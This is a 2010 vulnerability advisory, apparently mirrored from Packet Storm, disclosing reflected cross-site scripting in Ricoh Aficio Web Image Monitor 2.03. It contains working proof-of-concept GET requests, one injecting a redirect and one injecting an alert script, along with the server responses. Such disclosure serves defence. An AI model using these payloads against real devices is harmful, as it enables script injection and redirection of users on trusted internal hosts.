Lucene search
K

Ricoh Aficio Web Image Monitor 2.03 Cross Site Scripting

🗓️ 11 Nov 2010 00:00:00Reported by The Light CosineType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

Ricoh Aficio Web Image Monitor 2.03 XSS via Redirect and Traditional Tes

Code
`I was poking at some Ricoh MFPs several days ago, when I found this. It is  
nothing to get to terribly excited about as it's just a reflected XSS.  
However, the ability to abuse any trusted internal IP should be considered a  
threat. Companies have taken big hits from less. So without further ado,  
here are the petty little details:  
  
  
Tested successfully on numerous different Ricoh Aficio models, all running  
v2.03 of the Web Image Monitor interface. Responses included below are html  
encoded for your protection.  
  
Fun with Redirects:  
  
My inital test was just an abuse of the redirect functionality that is being  
exploited for the vector.  
  
GET /?";location.href="http://cosine-security.blogspot.com HTTP/1.1  
  
  
HTTP/1.0 200 OK  
  
Date: Tue, 09 Nov 2010 17:58:00 GMT  
  
Server: Web-Server/3.0  
  
Content-Type: text/html; charset=UTF-8  
  
Content-Length: 683  
  
Expires: Tue, 09 Nov 2010 17:58:00 GMT  
  
Pragma: no-cache  
  
Cache-Control: no-cache  
  
Set-Cookie: cookieOnOffChecker=on; path=/  
  
Connection: close  
  
  
<html><head>  
  
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">  
  
<meta http-equiv="refresh" content="1;  
URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">  
  
<meta http-equiv="Cache-Control" content="no-cache">  
  
<meta http-equiv="Pragma" content="no-cache">  
  
<meta http-equiv="Expires" content="-1">  
  
<title>Web Image Monitor</title>  
  
<script language="javascript">  
  
<!--  
  
function jumpPage(){  
  
self.document.cookie="cookieOnOffChecker=on; path=/";  
  
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?";location.href="  
http://cosine-security.blogspot.com";  
  
}  
  
// -->  
  
</script>  
  
</head>  
  
<body onLoad="jumpPage()"></body>  
  
</html>  
  
  
  
A more traditional XSS test will still work just as well of course:  
  
  
Traditional Test:  
  
GET /?--></script><script>alert(51494)</script>  
HTTP/1.1  
  
  
  
HTTP/1.0 200 OK  
  
Date: Fri, 29 Oct 2010 17:43:19 GMT  
  
Server: Web-Server/3.0  
  
Content-Type: text/html; charset=UTF-8  
  
Content-Length: 672  
  
Expires: Fri, 29 Oct 2010 17:43:19 GMT  
  
Pragma: no-cache  
  
Cache-Control: no-cache  
  
Set-Cookie: cookieOnOffChecker=on; path=/  
  
Connection: close  
  
  
<html><head>  
  
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">  
  
<meta http-equiv="refresh" content="1;  
URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">  
  
<meta http-equiv="Cache-Control" content="no-cache">  
  
<meta http-equiv="Pragma" content="no-cache">  
  
<meta http-equiv="Expires" content="-1">  
  
<title>Web Image Monitor</title>  
  
<script language="javascript">  
  
<!--  
  
function jumpPage(){  
  
self.document.cookie="cookieOnOffChecker=on; path=/";  
  
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?--></script><script>alert(51494)</script>";  
  
}  
  
// -->  
  
</script>  
  
</head>  
  
<body onLoad="jumpPage()"></body>  
  
  
The same writeup, including a screenshot, can be found at  
http://cosine-security.blogspot.com/2010/11/ricoh-web-image-monitor-203-reflected.html  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation